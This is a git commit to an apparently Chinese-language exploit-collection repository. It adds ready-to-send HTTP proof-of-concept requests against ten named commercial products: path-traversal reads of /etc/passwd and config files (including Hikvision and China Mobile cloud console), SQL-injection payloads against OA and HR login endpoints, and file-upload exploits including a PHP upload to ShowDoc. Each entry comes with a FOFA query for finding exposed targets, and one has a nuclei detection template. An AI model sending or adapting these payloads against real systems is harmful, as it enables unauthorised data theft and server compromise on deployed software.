6.2更新漏洞

This commit is contained in:
wy876 2024-06-02 20:24:10 +08:00
parent 3df4773cbe
commit 3e915b09e9
11 changed files with 372 additions and 1 deletions

View File

@ -0,0 +1,21 @@
## DT高清车牌识别摄像机存在任意文件读取漏洞
DT高清车牌识别摄像机是一种高科技产品主要用于抓拍和识别车牌信息用于交通管理、违章抓拍、电子收费等目的。DT-高清车牌识别摄像机存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件。
## fofa
```
app="DT-高清车牌识别摄像机"
```
## poc
```
GET /../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

View File

@ -1,5 +1,18 @@
# 漏洞收集
收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了500多个poc/exp善用CTRL+F搜索
收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了600多个poc/exp善用CTRL+F搜索
## 2024.06.02 新增漏洞
- 海康威视综合安防download存在任意文件读取漏洞
- 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入
- 翰智员工服务平台loginByPassword存在SQL注入漏洞
- DT高清车牌识别摄像机存在任意文件读取漏洞
- showDoc-uploadImg任意文件上传漏洞
- 全程云OA-svc.asmxSQL注入漏洞
- 中国移动云控制台存在任意文件读取
- 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞
- 金蝶云星空UserService反序列化漏洞
- 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞
## 2024.05.31 新增漏洞

View File

@ -0,0 +1,29 @@
## showDoc-uploadImg任意文件上传漏洞
showdoc是一个非常适合IT团队的在线API文档、技术文档工具它可以提高团队成员之间的沟通效率 使用此系统的用户众多目前github star 10k+。showdoc使用php+sqlite其历史版本接口 /index.php?s=/home/page/uploadImg 存在文件上传漏洞。
## fofa
```
app="ShowDoc"
```
## poc
```
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101
Firefox/88.0
Content-Length: 240
Content-Type: multipart/form-data; boundary=--------------------------7
Accept-Encoding: gzip
----------------------------7
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
----------------------------7--
```
![image-20240531130717905](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405311307017.png)

View File

@ -0,0 +1,50 @@
## 中国移动云控制台存在任意文件读取
中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息
## fofa
```
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
```
## poc
```
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: ip
```
![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)
## Yaml
```
id: cmecloud-console-readfile
info:
name: 移动云控制台存在任意文件读取
author: onewin
severity: high
description: 移动云控制台存在任意文件读取
http:
- raw:
- |+
@timeout: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root"
part: body
```

View File

@ -0,0 +1,33 @@
## 全程云OA-svc.asmxSQL注入漏洞
全程云OA svc.asmx 接口存在SQL注入漏洞攻击者通过SQL注入可以获取服务器数据库敏感信息
## fofa
```
"全程云OA" || "images/yipeoplehover.png"
```
## poc
```
POST /oa/pm/svc.asmx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36
Content-Length: 369
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetUsersInfo"
Accept-Encoding: gzip, deflate, br
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUsersInfo xmlns="http://tempuri.org/">
<userIdList>select @@version</userIdList>
</GetUsersInfo>
</soap:Body>
</soap:Envelope>
```
![image-20240602200806606](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022008666.png)

View File

@ -0,0 +1,37 @@
## 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞
> 泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
## fofa
```
product="泛微-EMobile"
```
## poc
```
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Length: 265
Content-Type: multipart/form-data; boundary=00content0boundary00
Sl-Ce-Suid: 15
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="source"
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/lGMXG.txt"
qNZGimiejDiiR5HKHubtm3Ib5WeWUnM6
--00content0boundary00--
```
![image-20240602201513765](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022015812.png)
![image-20240602201522994](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022015032.png)

View File

@ -0,0 +1,18 @@
## 海康威视综合安防download存在任意文件读取漏洞
综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。Hikvision综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞。
## fofa
```
title="综合安防管理平台"
```
## poc
```
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
```

View File

@ -0,0 +1,26 @@
## 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞
湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞导致系统被攻击与控制。
## fofa
```
body="Login/QRLogin.ashx"
```
## poc
```
POST /Common/DownLoad2.aspx HTTP/1.1
Host: 地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
path=..%2Flog4net.config&Name=
```
![湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022022928.png)

View File

@ -0,0 +1,31 @@
## 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入
科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
## fofa
```
body="科迅软件 版权所有"
```
## poc
```
POST /WebCloud.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "WebCloud/LibraryCloud"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<LibraryCloud xmlns="WebCloud">
<str>{"cmd":"login","schoolloginname":"1';WAITFOR DELAY '0:0:5'--","schoolpwd":"1"}</str>
<files>base64Binary</files>
</LibraryCloud>
</soap:Body>
</soap:Envelope>
```

View File

@ -0,0 +1,26 @@
## 翰智员工服务平台loginByPassword存在SQL注入漏洞
翰智员工服务平台登录接口loginByPassword处userName参数未对传入的数据进行严格校验和过滤导致造成SQL注入漏洞未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息。
## fofa
```
body="./static/hrfonts/iconfont.css"
```
## poc
```
POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Connection: keep-alive
Priority: u=1
{"userName":"'||(SELECT CHR(97)||CHR(122)||CHR(85)||CHR(72) FROM DUAL WHERE 7673=7673 AND 7374=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(72)||CHR(114)||CHR(99),5))||'","password":"'"}
```

File diff suppressed because one or more lines are too long